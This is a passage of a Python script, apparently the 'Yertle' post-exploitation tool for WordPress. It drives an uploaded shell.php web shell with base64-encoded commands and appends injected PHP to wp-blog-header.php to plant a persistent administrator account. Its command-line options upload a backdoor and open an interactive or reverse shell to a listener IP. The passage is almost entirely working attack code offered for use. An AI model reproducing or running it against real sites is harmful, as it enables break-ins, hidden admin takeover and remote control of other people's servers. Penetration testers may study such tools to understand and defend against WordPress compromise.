360 |         $new_user_password = '%s';
361 | 
362 |     if(!username_exists($new_user_email)) {
363 |       $user_id = wp_create_user($new_user, $new_user_password, $new_user_email);
364 | 
365 |       wp_update_user(array('ID' => $user_id, 'nickname' => $new_user, 'user_email' => $new_user_email));
366 |     }
367 |       $user = new WP_User($user_id);
368 |       $user->set_role('administrator');
369 |     ''' % (username, email, password)
370 |         payload = evilcode.encode('base64')
371 |         if warning():
372 |             params = [
373 |                 ('cmd',('php -r \'echo base64_decode("' + payload + '");\' >> ../../../wp-blog-header.php').encode('base64'))]
374 |             sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
375 |             print "Added persistent user \"%s\" with the password \"%s\"." % (username, password)
376 | 
377 | 
378 | def safety(host,uploaddir):
379 |     params = [('cmd', ('which php').encode('base64'))] #Checks which PHP
380 |     sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
381 |     results = sendcommand.text
382 |     params = [('cmd', ('readlink -e ' + results).encode('base64'))] # resolves Symlinks
383 |     sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
384 |     if "php-cgi" in sendcommand.text: #issues with php-cgi.  Aborts the module.
385 |         print "The PHP interpreter on this system is not compatible with this module."
386 |         return False
387 |     else:
388 |         return True
389 | 
390 | def exist_check(target,uploaddir):
391 |     r = requests.get(target + '/wp-content/plugins/' + uploaddir + '/shell.php')
392 |     if r.status_code == 200:
393 |         return True
394 |     else:
395 |         return False
396 | 
397 | def printbanner():
398 |     banner = """\
399 |      _..---.--.    __   __        _   _
400 |    .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
401 |   /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
402 |  (____.'.-_\____)    | |  __/ |  | |_| |  __/
403 |   (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
404 |    (_..)--(.._)'--'         ~n00py~
405 |       Post-exploitation Module for Wordpress
406 |                      v.1.1.0
407 |     """
408 |     print banner
409 | 
410 | 
411 | def argcheck(interactive,reverse,target):
412 | 
413 |     if interactive is False and reverse is False:
414 |         print "You must choose a type of shell: --reverse or --interactive"
415 |         sys.exit()
416 | 
417 |     if "http" not in target:
418 |         print"Please include the protocol in the URL"
419 |         sys.exit()
420 | 
421 | 
422 | def main():
423 |     parser = argparse.ArgumentParser(description='This a post-exploitation module for Wordpress')
424 |     parser.add_argument('-i','--interactive', help='Interactive command shell',required=False, action='store_true', default=True)
425 |     parser.add_argument('-r','--reverse',help='Reverse Shell', required=False, action='store_true')
426 |     parser.add_argument('-t','--target',help='URL of target', required=True)
427 |     parser.add_argument('-u','--username',help='Admin username', required=False)
428 |     parser.add_argument('-p','--password',help='Admin password', required=False)
429 |     parser.add_argument('-a', '--agent', help='Custom User Agent', required=False, default='Yertle uploader')
430 |     parser.add_argument('-li','--ip',help='Listener IP', required=False)
431 |     parser.add_argument('-lp','--port',help='Listener Port', required=False)
432 |     parser.add_argument('-v','--verbose',help=' Verbose output.', required=False, action='store_true')
433 |     parser.add_argument('-e','--existing',help=' Skips uploading a shell, and connects to existing shell', required=False)
434 |     args = parser.parse_args()
435 |     printbanner()
436 |     argcheck(args.interactive,args.reverse,args.target)
437 | 
438 |     if not args.reverse:
439 |         if args.existing is None:
440 |             if args.username is None or args.password is None:
441 |                 print "Username and Password are required"
442 |                 sys.exit()
443 |             uploaddir = uploadbackdoor(args.target, args.username, args.password, "shell", args.verbose, args.agent)
444 |         else:
445 |             uploaddir = args.existing
446 |         if exist_check(args.target, uploaddir):
447 |             commandloop(args.target, uploaddir)
448 |         else:
449 |             print "Existing shell not found.  Please verify the path or upload a new shell."
450 | 
451 |     if args.reverse and args.interactive:
452 |         if args.ip is None or args.port is None:
453 |             print "For a reverse shell, a listening IP and Port are required"
454 |             sys.exit()
455 |         if args.existing is None:
456 |             if args.username is None or args.password is None:
457 |                 print "Username and Password are required"
458 |                 sys.exit()
459 |             uploaddir = uploadbackdoor(args.target, args.username, args.password, "reverse", args.verbose, args.agent)
460 |         else:
461 |             uploaddir = args.existing
462 |         reverseshell(args.target, args.ip, args.port, uploaddir)
463 | 
464 | 
465 | if __name__ == "__main__":
466 |     main()
467 | 


--------------------------------------------------------------------------------